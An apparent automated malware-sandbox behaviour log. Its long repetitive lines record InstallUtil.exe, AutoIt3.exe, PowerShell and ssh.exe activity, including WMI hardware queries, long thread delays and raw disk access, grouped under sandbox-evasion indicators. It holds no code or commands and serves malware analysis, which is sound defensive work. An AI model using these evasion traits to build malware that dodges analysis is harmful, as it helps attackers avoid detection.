                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ahdccea\AutoIt3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\ahdccea\AutoIt3.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2A80000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2CC0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2A80000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2E50000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 3030000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 5030000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: C20000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 28F0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2720000 memory reserve | memory write watch
                    Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1782Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1612Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1142Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 351Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4787Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4971Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 4423Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 5174Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeAPI coverage: 5.7 %
                    Source: C:\ahdccea\AutoIt3.exeAPI coverage: 5.6 %
                    Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5820Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5820Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5892Thread sleep count: 1782 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5892Thread sleep count: 1612 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3560Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5692Thread sleep count: 1142 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5036Thread sleep count: 351 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6488Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                    Source: C:\Windows\System32\svchost.exe TID: 4124Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\svchost.exe TID: 5356Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6044Thread sleep time: -16602069666338586s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3580Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5664Thread sleep time: -31359464925306218s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5664Thread sleep time: -60000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5484Thread sleep time: -53914s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5664Thread sleep time: -59874s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5664Thread sleep time: -59765s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5484Thread sleep time: -57095s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5484Thread sleep time: -48518s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5664Thread sleep time: -59655s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5664Thread sleep time: -59546s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5484Thread sleep time: -31082s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5664Thread sleep time: -59437s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5664Thread sleep time: -59327s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5484Thread sleep time: -33223s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5484Thread sleep time: -55549s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5664Thread sleep time: -59218s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5664Thread sleep time: -59109s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5484Thread sleep time: -40624s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5664Thread sleep time: -58999s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5664Thread sleep time: -58882s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5484Thread sleep time: -30828s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5484Thread sleep time: -47207s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5664Thread sleep time: -58781s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5484Thread sleep time: -35191s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5484Thread sleep time: -48010s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5484Thread sleep time: -44265s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5484Thread sleep time: -51889s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5484Thread sleep time: -34703s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5484Thread sleep time: -32287s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5484Thread sleep time: -31902s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5484Thread sleep time: -36950s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5484Thread sleep time: -52285s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5484Thread sleep time: -48178s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5484Thread sleep time: -50028s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5484Thread sleep time: -52309s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5864Thread sleep time: -360000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5484Thread sleep time: -57961s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5484Thread sleep time: -36117s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5484Thread sleep time: -43446s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5484Thread sleep time: -50848s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5484Thread sleep time: -48112s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5484Thread sleep time: -49302s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5232Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5484Thread sleep time: -52005s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5484Thread sleep time: -43571s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1784Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1548Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
